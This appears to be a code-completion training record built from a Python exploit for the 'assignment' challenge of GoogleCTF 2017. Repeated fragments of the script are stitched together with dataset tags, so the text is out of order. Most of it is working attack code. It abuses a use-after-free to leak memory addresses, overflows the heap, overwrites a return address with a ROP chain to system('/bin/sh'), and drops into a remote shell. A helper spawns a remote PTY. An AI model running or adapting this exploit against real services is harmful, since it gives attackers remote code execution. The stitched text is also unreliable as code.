# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
# Trigger heap info leak
evl('h=0+0')
return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 0xb0
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(15):
evl('{}'.format(i))
# 19 slots filled
# allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
# Then the output value is allocated into the same slot. Since the output value is String (type of x),
# lhs is turned into a string with controlled pointer
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 0x170
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
# 2 slots always filled from now on (global object and int value 1337)
heap_base = heapleak()
# 3 slots always filled from now on
print_good("Heap base @ 0x{:x}".format(heap_base))
# Create a smallbin chunk so we can leak a libc pointer
evl('"{}"'.format('A' * 0x100))
gc(20 - 4)
# Leak freelist pointers pointing into the libc
heap_mem = leak(heap_base, 0x1000)
for i in range(0, len(heap_mem)-16, 8):
# Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
flink = u64(heap_mem[i:i+8])
blink = u64(heap_mem[i+8:i+16])
if (abs(flink - heap_base) > 0x10000 and
flink > 0x7f0000000000 and
flink < 0x800000000000 and
blink > 0x7f0000000000 and
blink < 0x800000000000):
break
else:
print_bad("No freelist pointers found :(")
return
libc = flink - 0x3c1928
print_good("libc @ 0x{:x}".format(libc))
# Leak stack pointer by reading environ pointer in libc
env_ptr = u64(leak2(libc + 0x3c44a0, 8))
print_good("stack @ 0x{:x}".format(env_ptr))
# Calculate addresses
system = libc + 0x46590
bin_sh = libc + 0x180103
pop_rdi = libc + 0x22b9a
pop_rsi = libc + 0x24885
pop_rdx = libc + 0x1b8e
add_rsp_0x48 = libc + 0xf5b8b
print_good("/bin/sh @ 0x{:x}".format(bin_sh))
input_buf = env_ptr - 0x328
print_good("input_buf @ 0x{:x}".format(input_buf))
ret_addr = env_ptr - 0x328 - 8
print_good("return address @ 0x{:x}".format(ret_addr))
# 5 slots always filled from now
#
# Heap spray with Property instances to get a controlled heap layout again
#
# Make some objects
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
# Trigger GC
for i in range(9):
evl('"{}"'.format('A' * 0x10))
evl('1337')
# 10 slots used
# Allocate lots of properties (but no values)
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
# Set up heap layout for unbounded heap overflow. We need the following layout:
# | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
# We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
for i in range(6):
evl('1337')
# Create some properties
for i in 'ghijk':
evl('{}=x'.format(i))
# Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
payload += b'\x00' * (0x180 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 0x1e80
# Trigger the overflow
evl('p=o+{}'.format(fake_str_addr))
# Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
payload = b'A' * 0x100
payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good("binary @ 0x{:x}".format(binary))
offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
print_good("offset to return address: 0x{:x}".format(offset_to_ret))
# Some unfortunate restrictions...
if offset_to_ret > 0x28 or offset_to_ret < 0:
print_bad("Bad offset")
return
prop_name = p64(binary + 0xAC9)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad("Bad propery name: {}".format(prop_name))
return
prop_name = chr(prop_name)
print_good("property name: {}".format(prop_name))
# Write ROP chain into stack
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
# Trigger corruption of InputBuffer.ptr to point further down in the stack
evl('{}=42'.format(prop_name))
# Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
payload = b'A'*offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
# Wait a short while and drop into interactive mode == shell
time.sleep(0.5)
interact()
if __name__ == '__main__':
pwn()
| elf._seq = self._generate(3)[:length]
| conditional_block |
snippet.py | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert(all(b not in data for b in badchars))
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
lines = []
chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\033['
ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception("Pattern length is way to large")
def _generate(self, n):
"""Generate a De Bruijn sequence."""
# See https://en.wikipedia.org/wiki/De_Bruijn_sequence
k = len(self.alphabet)
a = [0] * k * n
sequence = []
| if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx+len(needle):].find(needle) != -1:
raise ValueError("Multiple occurances found!")
return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
# Various Thresholds for the heuristics below
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
# Step 1: Tag every byte of the input stream with it's detected type.
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
# Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i+1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
# Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
# start and end point outside the range of equal-valued characters now.
if end - start >= Y+2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
# Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
buf = ''
last = None
for tag, value in parts:
# Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
# Step 4: Print :)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException("Server disconnected.")
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
# This code also works if n > len(self._buf)
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
# TODO maybe not make this O(n**2)...
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
# TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info("Server disconnected.")
return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert(sys.stdin.isatty())
c.setVerbose(False)
# Open a PTY and spawn a bash connected to the slave end on the remote side
code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
# Should maybe put some more functionality into the inline python code instead.
# Save current TTY settings
old_settings = termios.tcgetattr(sys.stdin.fileno())
# Put TTY into raw mode
tty.setraw(sys.stdin)
# Resize remote terminal
# Nice-to-have: also handle terminal resize
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n') # terminal echo
recvtil('READY\r\n') # command output
interact()
# Restore previous settings
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
# Trigger heap info leak
evl('h=0+0')
return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 0xb0
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(15):
evl('{}'.format(i))
# 19 slots filled
# allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
# Then the output value is allocated into the same slot. Since the output value is String (type of x),
# lhs is turned into a string with controlled pointer
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 0x170
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
# 2 slots always filled from now on (global object and int value 1337)
heap_base = heapleak()
# 3 slots always filled from now on
print_good("Heap base @ 0x{:x}".format(heap_base))
# Create a smallbin chunk so we can leak a libc pointer
evl('"{}"'.format('A' * 0x100))
gc(20 - 4)
# Leak freelist pointers pointing into the libc
heap_mem = leak(heap_base, 0x1000)
for i in range(0, len(heap_mem)-16, 8):
# Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
flink = u64(heap_mem[i:i+8])
blink = u64(heap_mem[i+8:i+16])
if (abs(flink - heap_base) > 0x10000 and
flink > 0x7f0000000000 and
flink < 0x800000000000 and
blink > 0x7f0000000000 and
blink < 0x800000000000):
break
else:
print_bad("No freelist pointers found :(")
return
libc = flink - 0x3c1928
print_good("libc @ 0x{:x}".format(libc))
# Leak stack pointer by reading environ pointer in libc
env_ptr = u64(leak2(libc + 0x3c44a0, 8))
print_good("stack @ 0x{:x}".format(env_ptr))
# Calculate addresses
system = libc + 0x46590
bin_sh = libc + 0x180103
pop_rdi = libc + 0x22b9a
pop_rsi = libc + 0x24885
pop_rdx = libc + 0x1b8e
add_rsp_0x48 = libc + 0xf5b8b
print_good("/bin/sh @ 0x{:x}".format(bin_sh))
input_buf = env_ptr - 0x328
print_good("input_buf @ 0x{:x}".format(input_buf))
ret_addr = env_ptr - 0x328 - 8
print_good("return address @ 0x{:x}".format(ret_addr))
# 5 slots always filled from now
#
# Heap spray with Property instances to get a controlled heap layout again
#
# Make some objects
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
# Trigger GC
for i in range(9):
evl('"{}"'.format('A' * 0x10))
evl('1337')
# 10 slots used
# Allocate lots of properties (but no values)
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
# Set up heap layout for unbounded heap overflow. We need the following layout:
# | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
# We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
for i in range(6):
evl('1337')
# Create some properties
for i in 'ghijk':
evl('{}=x'.format(i))
# Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
payload += b'\x00' * (0x180 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 0x1e80
# Trigger the overflow
evl('p=o+{}'.format(fake_str_addr))
# Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
payload = b'A' * 0x100
payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good("binary @ 0x{:x}".format(binary))
offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
print_good("offset to return address: 0x{:x}".format(offset_to_ret))
# Some unfortunate restrictions...
if offset_to_ret > 0x28 or offset_to_ret < 0:
print_bad("Bad offset")
return
prop_name = p64(binary + 0xAC9)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad("Bad propery name: {}".format(prop_name))
return
prop_name = chr(prop_name)
print_good("property name: {}".format(prop_name))
# Write ROP chain into stack
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
# Trigger corruption of InputBuffer.ptr to point further down in the stack
evl('{}=42'.format(prop_name))
# Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
payload = b'A'*offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
# Wait a short while and drop into interactive mode == shell
time.sleep(0.5)
interact()
if __name__ == '__main__':
pwn() | def db(t, p): | random_line_split |
snippet.py | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert(all(b not in data for b in badchars))
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
lines = []
chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\033['
ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
